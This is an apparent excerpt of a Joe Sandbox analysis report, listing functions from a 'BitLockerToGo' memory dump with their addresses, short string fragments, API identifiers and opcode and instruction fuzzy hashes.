                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: "rD$MNOP$RlD$bpD$koD$rlD
                                                                                                                                                                          • API String ID: 0-406179893
                                                                                                                                                                          • Opcode ID: 8a1a26636fe8f9ae544f2c1992a448c6edbea5a4b0a5ed36d256c72b1e818340
                                                                                                                                                                          • Instruction ID: 18aecb7f58442ab272fd49af5572027e24a4e6bffacdaf05d7047bf41a402aad
                                                                                                                                                                          • Opcode Fuzzy Hash: 8a1a26636fe8f9ae544f2c1992a448c6edbea5a4b0a5ed36d256c72b1e818340
                                                                                                                                                                          • Instruction Fuzzy Hash: 5312F136708311CFD708CF28E89026AB7E2FB8A315F1A857ED485973A2D774D946CB85
                                                                                                                                                                          Function 0040DC00 Relevance: 7.7, Strings: 6, Instructions: 218COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 4$>G$cae`$sfoj$uawh$~ug}
                                                                                                                                                                          • API String ID: 0-40103800
                                                                                                                                                                          • Opcode ID: 1b1787792d23b21b9764f4874d6a9d439f714137f28e82940ea40a2f43e097be
                                                                                                                                                                          • Instruction ID: 0eed4f4956e7e88e46ad646ad5d3584da1fc03cd4ccb8ef5a45b1f39504a9e9b
                                                                                                                                                                          • Opcode Fuzzy Hash: 1b1787792d23b21b9764f4874d6a9d439f714137f28e82940ea40a2f43e097be
                                                                                                                                                                          • Instruction Fuzzy Hash: 9E61017154C3818BD3118F69C49036BFFE1AFA2340F184AADE8C45B392D7798909CB9B
                                                                                                                                                                          Function 0042C5A0 Relevance: 6.8, Strings: 5, Instructions: 540COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: MNOP$MNOP$WS$Z[$iW
                                                                                                                                                                          • API String ID: 0-2174644700
                                                                                                                                                                          • Opcode ID: ddec0c380ac517acfa482a69a21ea75a9b3f7248e8c135a75b7ab8a1ee6ed357
                                                                                                                                                                          • Instruction ID: 2e841e770ded7ddd37e7e8edceb96449d2e0203d08f27b8edcd6fcbf8cd919ff
                                                                                                                                                                          • Opcode Fuzzy Hash: ddec0c380ac517acfa482a69a21ea75a9b3f7248e8c135a75b7ab8a1ee6ed357
                                                                                                                                                                          • Instruction Fuzzy Hash: F112CDB4608340CFE324CF25D88176FBBE1FB86304F54892DE5899B251EB799809CB96
                                                                                                                                                                          Function 00430280 Relevance: 5.6, Strings: 4, Instructions: 562COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: /U$MNOP$qC$r
                                                                                                                                                                          • API String ID: 0-3206768514
                                                                                                                                                                          • Opcode ID: 3537189cdea41c90d15e821171f8afb36a41bcdc7f0f1f8578abd451b47cf2a5
                                                                                                                                                                          • Instruction ID: 15317c2b67b06c9588edd17e9d89352afcab9f8ddcd52107280e1c02b600b630
                                                                                                                                                                          • Opcode Fuzzy Hash: 3537189cdea41c90d15e821171f8afb36a41bcdc7f0f1f8578abd451b47cf2a5
                                                                                                                                                                          • Instruction Fuzzy Hash: 6312257550C380DFC3048F2898A166FBBE2AF99314F189A6DF4D5873A2C739D905CB5A
                                                                                                                                                                          Function 00438BF0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 178COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MetricsSystem
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4116985748-3916222277
                                                                                                                                                                          • Opcode ID: 3e1c03df17c1fed9ce7e26bf23ba8afee7171c343c2eaae075f166e9d044eff2
                                                                                                                                                                          • Instruction ID: f0566bba41c27eb8cdf32f8d29e862bd84efc57d896874c1dd1a7d1f40a3107a
                                                                                                                                                                          • Opcode Fuzzy Hash: 3e1c03df17c1fed9ce7e26bf23ba8afee7171c343c2eaae075f166e9d044eff2
                                                                                                                                                                          • Instruction Fuzzy Hash: 39B17FB810A3848BD3B4DF54C48978FBBE0BF85309F50896ED9995B251D7B8544C8F86
                                                                                                                                                                          Function 00423E90 Relevance: 4.4, Strings: 3, Instructions: 675COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: MNOP$MNOP$zx
                                                                                                                                                                          • API String ID: 0-3655013995
                                                                                                                                                                          • Opcode ID: de66a204e3f2a304b3f3d4ef51d08d61fa25a3dd1726051d81abdebcb3057646
                                                                                                                                                                          • Instruction ID: 321856d8c7f84413d7627014aa985941360c7ad03aa8f4a648d5f22e12be0329
                                                                                                                                                                          • Opcode Fuzzy Hash: de66a204e3f2a304b3f3d4ef51d08d61fa25a3dd1726051d81abdebcb3057646
                                                                                                                                                                          • Instruction Fuzzy Hash: 3F3224757083509BE730DF15E881BABB7E2EBC4744F54882EE9898B381E7789841CB56
                                                                                                                                                                          Function 004202C1 Relevance: 4.3, Strings: 3, Instructions: 559COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                          • String ID: MNOP$MNOP$uB
                                                                                                                                                                          • API String ID: 2994545307-1542835258
                                                                                                                                                                          • Opcode ID: 431241ef4b3c1d1b5e8a08b224de91a2f83affc30f322022e8a68d4e05fee315
                                                                                                                                                                          • Instruction ID: cc9cb857e5cf7ac4a553318d6eeeaad38e1f3c4e5b4f88ee06e21b461ca5caa2
                                                                                                                                                                          • Opcode Fuzzy Hash: 431241ef4b3c1d1b5e8a08b224de91a2f83affc30f322022e8a68d4e05fee315
                                                                                                                                                                          • Instruction Fuzzy Hash: 3EF14036B143608BE324DF24E890B6B73D3ABD4301F698A2DD98597353E778DC418B96
                                                                                                                                                                          Function 00424B50 Relevance: 4.2, Strings: 3, Instructions: 465COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: )641$X$hxjw
                                                                                                                                                                          • API String ID: 0-3547115419
                                                                                                                                                                          • Opcode ID: fb613edcf8c060b9de73b57934339f11fcee25f3a2b76cb9bd02c217791f9776
                                                                                                                                                                          • Instruction ID: 6c83c6b268e6d71724dc77d9fcbd8c094540905710322347e155282233bd9018
                                                                                                                                                                          • Opcode Fuzzy Hash: fb613edcf8c060b9de73b57934339f11fcee25f3a2b76cb9bd02c217791f9776
                                                                                                                                                                          • Instruction Fuzzy Hash: 3EE11B75A09350ABE310DF25DC41BABBBE5DFC5708F04882EF88997391D638D9058B97
                                                                                                                                                                          Function 00446F80 Relevance: 4.1, Strings: 3, Instructions: 364COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: "rD$3fa$bpD
                                                                                                                                                                          • API String ID: 0-1262108915
                                                                                                                                                                          • Opcode ID: 2a8a51890aaa34771e10f51c2cdda0cc3b12809cd2405160337c49134f0a8806
                                                                                                                                                                          • Instruction ID: 13244d16c211bb2bcad218a3c81ced2cb02ffc49be0db0752046de5e5c6aa462
                                                                                                                                                                          • Opcode Fuzzy Hash: 2a8a51890aaa34771e10f51c2cdda0cc3b12809cd2405160337c49134f0a8806
                                                                                                                                                                          • Instruction Fuzzy Hash: 1BB1DD36608311CFD718CF28E99026AB7E2EBCA315F19897EE48687392D774DC02CB45
                                                                                                                                                                          Function 0042E343 Relevance: 4.0, Strings: 3, Instructions: 269COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: #L\R$,\CV$O4L7
                                                                                                                                                                          • API String ID: 0-3787581059
                                                                                                                                                                          • Opcode ID: a0b4944614542bf3a67a706ec71c8da98a22602492111a164afab445c67177d5
                                                                                                                                                                          • Instruction ID: 6302cf0bee94a5ad652b07018c9a66b50cf7abdea086f3622bd106122652f469
                                                                                                                                                                          • Opcode Fuzzy Hash: a0b4944614542bf3a67a706ec71c8da98a22602492111a164afab445c67177d5
                                                                                                                                                                          • Instruction Fuzzy Hash: 319127B2A087018FC718CF69D89071BB7E2ABC4314F59863DE955CB392DB78D805CB85
                                                                                                                                                                          Function 0042E9BD Relevance: 4.0, Strings: 3, Instructions: 244COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: MNOP$MNOP$B
                                                                                                                                                                          • API String ID: 0-2013082597
                                                                                                                                                                          • Opcode ID: 080050fa7587acd1f775651b2bd02c6b12d03c12fcd785cb6d4a9dfab969163c
                                                                                                                                                                          • Instruction ID: 427106f293819a470450e0932dc21dc8bd031f23ee4c1c387aa55c50c85ec932
                                                                                                                                                                          • Opcode Fuzzy Hash: 080050fa7587acd1f775651b2bd02c6b12d03c12fcd785cb6d4a9dfab969163c
                                                                                                                                                                          • Instruction Fuzzy Hash: 8181AA75A08341CFD728CF15E89172FBBE2BBC8304F15896DE4995B3A1C7788905CB8A
                                                                                                                                                                          Function 0042D621 Relevance: 3.0, Strings: 2, Instructions: 539COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 2B$<=
                                                                                                                                                                          • API String ID: 0-1898675190
                                                                                                                                                                          • Opcode ID: 71a5038b86cab153bf550eff5ef4d684302044054bd1ddd42832d1e36cc30579
                                                                                                                                                                          • Instruction ID: c902f626a9b2f13d1863b0adeac4f1cac601c152034ac004fa58715ea0083c5e
                                                                                                                                                                          • Opcode Fuzzy Hash: 71a5038b86cab153bf550eff5ef4d684302044054bd1ddd42832d1e36cc30579
                                                                                                                                                                          • Instruction Fuzzy Hash: 8EF126B5A083518FD714CF24E85166BBBE1AFDA304F58886EE4C597342D33CD909CB5A
                                                                                                                                                                          Function 004293D0 Relevance: 2.9, Strings: 2, Instructions: 435COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: MNOP$
                                                                                                                                                                          • API String ID: 0-2323356958
                                                                                                                                                                          • Opcode ID: acb73d4741fa7ff19f24c221892feda4fa04e8f1d9badb7c6a748042e386b80c
                                                                                                                                                                          • Instruction ID: b6dfaf9e55cd36c7b9c46e181ae13ac35b13c4755dd509cd8cc4a280139a5cd8
                                                                                                                                                                          • Opcode Fuzzy Hash: acb73d4741fa7ff19f24c221892feda4fa04e8f1d9badb7c6a748042e386b80c
                                                                                                                                                                          • Instruction Fuzzy Hash: 29B11571A083219BD7109F24D85276BB3E1EF92354F49892DE8D59B381E33CDD05C35A
                                                                                                                                                                          Function 00423ABE Relevance: 2.7, Strings: 2, Instructions: 232COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: nGFA$IJK
                                                                                                                                                                          • API String ID: 0-1749064823
                                                                                                                                                                          • Opcode ID: 32ca8b0045ce1c4e5cc0fab50190c03de2ed0d81290e2cc004ad6fc4b2267251
                                                                                                                                                                          • Instruction ID: 21d745270b471f1d4c01b6df011f032facef380b6dec7a8f7277d613ea3c0f42
                                                                                                                                                                          • Opcode Fuzzy Hash: 32ca8b0045ce1c4e5cc0fab50190c03de2ed0d81290e2cc004ad6fc4b2267251
                                                                                                                                                                          • Instruction Fuzzy Hash: C86104B1A0836187D7049F25D85132BBBF1AF92315F58886DE4C55B391E33DCA05C79A
                                                                                                                                                                          Function 00423AD1 Relevance: 2.7, Strings: 2, Instructions: 227COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: nGFA$IJK
                                                                                                                                                                          • API String ID: 0-1749064823
                                                                                                                                                                          • Opcode ID: e73a2807429df7b1cf928445aa40c9891d0ef5a7944cfa731405fd7e9330edba
                                                                                                                                                                          • Instruction ID: f90c9582e09deafeb7b9d3ee4e8ee34dfd224ea527017794ff2a400d7b586160
                                                                                                                                                                          • Opcode Fuzzy Hash: e73a2807429df7b1cf928445aa40c9891d0ef5a7944cfa731405fd7e9330edba
                                                                                                                                                                          • Instruction Fuzzy Hash: 0C5114B1A0836187C7049F25D85232BBBF1AF92315F58886DE4C59B395E33DCA05C79A
                                                                                                                                                                          Function 00441EA0 Relevance: 2.6, Strings: 2, Instructions: 144COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: MNOP$uxVd
                                                                                                                                                                          • API String ID: 0-3748827735
                                                                                                                                                                          • Opcode ID: 3ce69d8cfed16dda00176407c52470a24fa2c3a1029f26bb4b6623db9ed90d46
                                                                                                                                                                          • Instruction ID: f33051061eddafaf0435789cc0bde659aa8a6e4772a0d0252a87f7e630da701a
                                                                                                                                                                          • Opcode Fuzzy Hash: 3ce69d8cfed16dda00176407c52470a24fa2c3a1029f26bb4b6623db9ed90d46
                                                                                                                                                                          • Instruction Fuzzy Hash: 44414936604305ABEB24CF50DC81A6BB7E2EB84345F18842EF98583361E739DC95CB56
                                                                                                                                                                          Function 00430A1E Relevance: 2.6, Strings: 2, Instructions: 72COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: MNOP$MNOP
                                                                                                                                                                          • API String ID: 0-1891600022
                                                                                                                                                                          • Opcode ID: 7cff2fdadd37ce41135831ed0d1d104eda16a9ad87060848c7aee7f8be36cd33
                                                                                                                                                                          • Instruction ID: 8284e26e75838f04d631bc8381044ea656cccf46fe6b2abe2970d53498321b1a
                                                                                                                                                                          • Opcode Fuzzy Hash: 7cff2fdadd37ce41135831ed0d1d104eda16a9ad87060848c7aee7f8be36cd33
                                                                                                                                                                          • Instruction Fuzzy Hash: 7D11D3742183408BD3598B2490A173FB7A1AF9A725F64771ED4D217352C338CC078B8A
                                                                                                                                                                          Function 0042EE18 Relevance: 2.5, Strings: 2, Instructions: 46COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: MNOP$MNOP
                                                                                                                                                                          • API String ID: 0-1891600022
                                                                                                                                                                          • Opcode ID: 7d3f96c1c78b8e52bc291fedaea7e954ff11efa6c3e3de2fd2e65b9a40faa164
                                                                                                                                                                          • Instruction ID: 439d2e5539f73d91c69a3b3c8f5523551d8645751e1aefbde30932ea6b38cdf0
                                                                                                                                                                          • Opcode Fuzzy Hash: 7d3f96c1c78b8e52bc291fedaea7e954ff11efa6c3e3de2fd2e65b9a40faa164
                                                                                                                                                                          • Instruction Fuzzy Hash: 18F081307083508BD718CF15949162FB3E2ABCA725F599A2DD8A113762C778DC06C78A
                                                                                                                                                                          Function 00429170 Relevance: 1.7, APIs: 1, Instructions: 241comCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • CoCreateInstance.OLE32(0044AA60,00000000,00000001,0044AA50), ref: 00429199
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateInstance
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 542301482-0
                                                                                                                                                                          • Opcode ID: b99b672fa0d1a0791a3e0b1aa2a04533db7b2d58bb39140e5c5c234f5807f35f
                                                                                                                                                                          • Instruction ID: 861df7cfd0ec1d8353c48d681c409214712c1da7751210e01cd4dba012062f5e
                                                                                                                                                                          • Opcode Fuzzy Hash: b99b672fa0d1a0791a3e0b1aa2a04533db7b2d58bb39140e5c5c234f5807f35f
                                                                                                                                                                          • Instruction Fuzzy Hash: 7351D0B0740224ABDB20DF64DC86BB773A4EF85358F484959F9858B391E379EC05C72A
                                                                                                                                                                          Function 0042BABB Relevance: 1.7, Strings: 1, Instructions: 438COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: MNOP
                                                                                                                                                                          • API String ID: 0-783613192
                                                                                                                                                                          • Opcode ID: 254c08e4fc0af992e87096fdd0965cb0027b107f1de24035e27f8b1a4472a697
                                                                                                                                                                          • Instruction ID: d9b913763cde8ab17407b7b613ecdb6cd3e0a9648c947809f0fffd656cc1c9d0
                                                                                                                                                                          • Opcode Fuzzy Hash: 254c08e4fc0af992e87096fdd0965cb0027b107f1de24035e27f8b1a4472a697
                                                                                                                                                                          • Instruction Fuzzy Hash: 1ED11A76E10225CBCB14CF69D8805FFB7B2FF99750B5A805AD851AB351EB389C02CB94
                                                                                                                                                                          Function 00442AB0 Relevance: 1.5, Strings: 1, Instructions: 252COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                          • String ID: MNOP
                                                                                                                                                                          • API String ID: 2994545307-783613192
                                                                                                                                                                          • Opcode ID: 20cff1a09187d80d78f333ffd54a583299aa65ebedb1aa3fa9d58431950b325b
                                                                                                                                                                          • Instruction ID: 47f6a540994abda0ca95af1d4d8400089509cea07912db9806ada367cd1df040
                                                                                                                                                                          • Opcode Fuzzy Hash: 20cff1a09187d80d78f333ffd54a583299aa65ebedb1aa3fa9d58431950b325b
                                                                                                                                                                          • Instruction Fuzzy Hash: B071F471A083519BE724DE14C99072FB7E2ABC4310F58892EF5D587391D7B9DC418B8A
                                                                                                                                                                          Function 0042C2D0 Relevance: 1.5, Strings: 1, Instructions: 230COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: ^gPa
                                                                                                                                                                          • API String ID: 0-3338696370
                                                                                                                                                                          • Opcode ID: 3fa0d9d744f4436786475589ad33c25d082095f5f124f09c08b6816f13a77364
                                                                                                                                                                          • Instruction ID: cfc53848df0636c6e94bbd6cbcea6e1b620f617224d22baaa1d7e80c890d0e2e
                                                                                                                                                                          • Opcode Fuzzy Hash: 3fa0d9d744f4436786475589ad33c25d082095f5f124f09c08b6816f13a77364
                                                                                                                                                                          • Instruction Fuzzy Hash: 9561F1B1A083108BC710DF29E88166BBBF0FF92358F548A1DE5D54B391E379C508CB8A
                                                                                                                                                                          Function 0042C5E2 Relevance: 1.4, Strings: 1, Instructions: 170COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: GlTf
                                                                                                                                                                          • API String ID: 0-474796513
                                                                                                                                                                          • Opcode ID: 2744b3095d9331d2d04f4965c2a23c01c5bee9fa425fc6daf1bc987e0f4e2324
                                                                                                                                                                          • Instruction ID: 74236ba9b3cc0a08cc7b30631b95950895f961cd6357d48f1186514dadc75d39
                                                                                                                                                                          • Opcode Fuzzy Hash: 2744b3095d9331d2d04f4965c2a23c01c5bee9fa425fc6daf1bc987e0f4e2324
                                                                                                                                                                          • Instruction Fuzzy Hash: 78518F217483608EC7208B2894C02ABBBD3DF96390F8E467BD5910B3D6D33D890DD399
                                                                                                                                                                          Function 0042F221 Relevance: 1.3, Strings: 1, Instructions: 75COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: MNOP
                                                                                                                                                                          • API String ID: 0-783613192
                                                                                                                                                                          • Opcode ID: d70cf771bb6948a5b131557e404139c602a0556bf47dfb866429cda241d115a6
                                                                                                                                                                          • Instruction ID: 93aec46a1ed4ed383512bcc5e4c122afa6c5bbd32670e5a8da2dae97cf3d04b7
                                                                                                                                                                          • Opcode Fuzzy Hash: d70cf771bb6948a5b131557e404139c602a0556bf47dfb866429cda241d115a6
                                                                                                                                                                          • Instruction Fuzzy Hash: 5611D638B02220DBCF28CF94B89177E7372EB06B55FE450BDE80127212C7669D068B5C
                                                                                                                                                                          Function 00430991 Relevance: 1.3, Strings: 1, Instructions: 63COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: MNOP
                                                                                                                                                                          • API String ID: 0-783613192
                                                                                                                                                                          • Opcode ID: b41f2ee70218142b522e4924884a307dd4c290964df95a35abad5bc98069a258
                                                                                                                                                                          • Instruction ID: 48c650eff71184f3e55c5af46ee2342b2f9423c61d45832d47eea70e80801630
                                                                                                                                                                          • Opcode Fuzzy Hash: b41f2ee70218142b522e4924884a307dd4c290964df95a35abad5bc98069a258
